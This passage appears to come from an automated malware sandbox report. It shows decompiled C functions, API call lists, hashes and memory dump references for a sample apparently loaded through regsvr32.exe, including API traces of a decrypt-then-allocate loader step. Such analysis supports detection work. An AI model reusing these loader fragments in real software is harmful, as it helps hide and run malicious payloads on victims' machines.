                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 3740afbeb06ffdb1f66f946129ecd2bf5f9b3e9a00392e7605de6320aaa2af45
                                                                                                                                                                                                                                • Instruction ID: 76b3483cd924403b0a86354935009508570ded49284563abeb16188e1b9ec67a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3740afbeb06ffdb1f66f946129ecd2bf5f9b3e9a00392e7605de6320aaa2af45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50E04F3260293367823276AAAC58DABDDACEF92BF03050165BD08D3621DE20CC42C7F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A818B3, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E00A818B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00A85157(_t2);
				if(_t34 != 0) {
					_t30 = E00A85157(_t28);
					if(_t30 == 0) {
						E00A853BB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00A8A962(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00A8A962(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                                                                                                                0x00a818b3
                                                                                                                                                                                                                                0x00a818bd
                                                                                                                                                                                                                                0x00a818bf
                                                                                                                                                                                                                                0x00a818c5
                                                                                                                                                                                                                                0x00a818c5
                                                                                                                                                                                                                                0x00a818ce
                                                                                                                                                                                                                                0x00a818d2
                                                                                                                                                                                                                                0x00a818de
                                                                                                                                                                                                                                0x00a818e2
                                                                                                                                                                                                                                0x00a81956
                                                                                                                                                                                                                                0x00a818e4
                                                                                                                                                                                                                                0x00a818e4
                                                                                                                                                                                                                                0x00a818e8
                                                                                                                                                                                                                                0x00a818ed
                                                                                                                                                                                                                                0x00a818f2
                                                                                                                                                                                                                                0x00a8190c
                                                                                                                                                                                                                                0x00a818fb
                                                                                                                                                                                                                                0x00a818fb
                                                                                                                                                                                                                                0x00a818ff
                                                                                                                                                                                                                                0x00a81902
                                                                                                                                                                                                                                0x00a81907
                                                                                                                                                                                                                                0x00a81907
                                                                                                                                                                                                                                0x00a81911
                                                                                                                                                                                                                                0x00a81939
                                                                                                                                                                                                                                0x00a8193f
                                                                                                                                                                                                                                0x00a81942
                                                                                                                                                                                                                                0x00a81913
                                                                                                                                                                                                                                0x00a81915
                                                                                                                                                                                                                                0x00a8191d
                                                                                                                                                                                                                                0x00a81928
                                                                                                                                                                                                                                0x00a8192d
                                                                                                                                                                                                                                0x00a8192d
                                                                                                                                                                                                                                0x00a81949
                                                                                                                                                                                                                                0x00a81950
                                                                                                                                                                                                                                0x00a81951
                                                                                                                                                                                                                                0x00a81951
                                                                                                                                                                                                                                0x00a818e2
                                                                                                                                                                                                                                0x00a81961

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4,?,01AE9618), ref: 00A818BF
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                  • Part of subcall function 00A8A962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A818ED,00000000,00000001,00000001,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618), ref: 00A8A970
                                                                                                                                                                                                                                  • Part of subcall function 00A8A962: StrChrA.SHLWAPI(?,0000003F,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60,?), ref: 00A8A97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4), ref: 00A8191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 00A8192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A81939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: 5c481cecbde0b3030759ee39bb82bbc6a6fdf19275a6246d5d17eb1f0f96c83a
                                                                                                                                                                                                                                • Instruction ID: 81b5d13618d1826457e4ac624768a18b497b19a89683fe1a812501b64b7a68e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c481cecbde0b3030759ee39bb82bbc6a6fdf19275a6246d5d17eb1f0f96c83a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21B772904255EBCB117FB4CC58A9A7FBDAF06794F154054F9459B201D731CA02C7A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A81FCE, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00A85157(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                                                                                                                0x00a81fe3
                                                                                                                                                                                                                                0x00a81fe7
                                                                                                                                                                                                                                0x00a81ff1
                                                                                                                                                                                                                                0x00a81ff6
                                                                                                                                                                                                                                0x00a81ffb
                                                                                                                                                                                                                                0x00a81ffd
                                                                                                                                                                                                                                0x00a82005
                                                                                                                                                                                                                                0x00a8200a
                                                                                                                                                                                                                                0x00a82018
                                                                                                                                                                                                                                0x00a8201d
                                                                                                                                                                                                                                0x00a82027

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,01AE9364,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A81FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00A829B1,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A81FE5
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A82005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,00A829B1,00000002,00000000,004F0053,747869A0,?,?,00A829B1,004F0053,01AE9364), ref: 00A82018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: 2bfb76ec13afcbe0812c1fc5b359b243a106ab86dd3da84848f28af071d8772c
                                                                                                                                                                                                                                • Instruction ID: 2df7b1d14bed73d167f3e4d444f941162695cb854219529971080f909b3f5540
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bfb76ec13afcbe0812c1fc5b359b243a106ab86dd3da84848f28af071d8772c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF0E776900119FBCB11EFA9CC89CDEBBADEF493947154066B90897212E631EA14DBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A82629, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 9c3bb96d79d278814c55d31245602eccec97228d5e5069dae4ae3e8ad7d98cef
                                                                                                                                                                                                                                • Instruction ID: 5e46788e8fd7cb731170e61a400d92086d8ad78351ae35de9ed63ce080671356
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c3bb96d79d278814c55d31245602eccec97228d5e5069dae4ae3e8ad7d98cef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DE01273901621A7C711EBE4AC4CC5BBBBDEF897A17040416F600D7111C73599068FF1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 7000 Parent PID: 6980 regsvr32.exeCOMMON

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 736D61F0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 193memoryencryptionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(0000000E,0000AA01,00003000,00000004), ref: 736D6265
                                                                                                                                                                                                                                • CryptImportKey.ADVAPI32(?,00000208,0000002C,00000000,00000001,?), ref: 736D639B
                                                                                                                                                                                                                                • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,0000AA00), ref: 736D63BD
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,0000AA00,00003000,00000004), ref: 736D63D2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocCryptVirtual$DecryptImport
                                                                                                                                                                                                                                • String ID: $KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 4282381441-467793799
                                                                                                                                                                                                                                • Opcode ID: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction ID: f0fa7c921dd1f86e776c8aa6a29a920ccb5ffd890efd8f7f25b12171d1663752
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81D231E043588FDB01CFA8CA44BADBBB5FB59304F24829DD948AB286DB719945CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6AD0, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 342memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,7614F7F0,00000000,761536A0), ref: 736D6C56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: zdms
                                                                                                                                                                                                                                • API String ID: 4275171209-1934084468
                                                                                                                                                                                                                                • Opcode ID: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction ID: 774b0289d904b06fdd56817648df59fe60c0c5a46fdbc45900e6772045a7fd53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BD1B275A10A16CFCF11CF58C680BAAB7B6FF48314F6941A9D806AB3C6D370E951CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D700B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E736D700B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x736e9a08);
				E736D7870(__ebx, __edi, __esi);
				_t34 =  *0x736ef120; // 0x1
				if(_t34 > 0) {
					 *0x736ef120 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E736D7453();
					 *(_t82 - 4) = 1;
					__eflags =  *0x736ef460 - 2;
					if( *0x736ef460 != 2) {
						E736D76ED(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x736e9a30);
						E736D7870(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E736D700B(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E736D71C6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x736ef120 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E736D751E(__ebx, _t61, 1, __esi);
						E736D73DA();
						E736D783C();
						 *0x736ef460 =  *0x736ef460 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E736D70A0();
						_t54 = E736D76BF( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E736D70AD();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}
















                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700d
                                                                                                                                                                                                                                0x736d7012
                                                                                                                                                                                                                                0x736d7017
                                                                                                                                                                                                                                0x736d701e
                                                                                                                                                                                                                                0x736d7025
                                                                                                                                                                                                                                0x736d702d
                                                                                                                                                                                                                                0x736d7030
                                                                                                                                                                                                                                0x736d7039
                                                                                                                                                                                                                                0x736d703c
                                                                                                                                                                                                                                0x736d703f
                                                                                                                                                                                                                                0x736d7046
                                                                                                                                                                                                                                0x736d70b5
                                                                                                                                                                                                                                0x736d70ba
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70ca
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D7052
                                                                                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 736D706C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                                                                                • Opcode ID: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
                                                                                                                                                                                                                                • Instruction ID: 86c9b1130994403542d4f57d1ba38c5bb9deead51921a4127dfe88e3e65fea96
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E641C472E21718AFEF119F69DD00FAE7FB5EF84690F15421AE815572C4D7308D018BA6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D70BB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E736D70BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x736e9a30);
				E736D7870(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
